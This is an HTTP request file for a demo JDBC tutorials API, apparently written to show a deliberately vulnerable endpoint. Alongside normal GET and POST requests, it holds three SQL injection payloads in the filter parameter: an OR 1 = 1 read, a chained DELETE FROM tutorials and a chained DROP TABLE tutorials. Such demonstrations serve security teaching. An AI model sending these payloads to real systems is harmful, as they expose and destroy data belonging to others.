###
GET http://{{host}}/api-jdbc/tutorials HTTP/1.1
Content-Type: application/json

###
GET http://{{host}}/api-jdbc/tutorials/1012 HTTP/1.1
Content-Type: application/json

### vulnerable endpoint: We can use sql injection to read more data:
GET http://{{host}}/api-jdbc/tutorials/vulnerable?filter="tutorial1" OR 1 = 1 HTTP/1.1
Content-Type: application/json

### vulnerable endpoint: We can use sql injection to delete records:
GET http://{{host}}/api-jdbc/tutorials/vulnerable?filter="tutorial1"; DELETE FROM tutorials HTTP/1.1
Content-Type: application/json

### vulnerable endpoint: We can use sql injection to run DDL statement - for example "DROP table tutorials":
GET http://{{host}}/api-jdbc/tutorials/vulnerable?filter="tutorial1"; DROP TABLE tutorials HTTP/1.1
Content-Type: application/json

###
POST http://{{host}}/api-jdbc/tutorials
Content-Type: application/json

{
  "title": "title1",
  "description": "description1",
  "link": "http://google.com"
}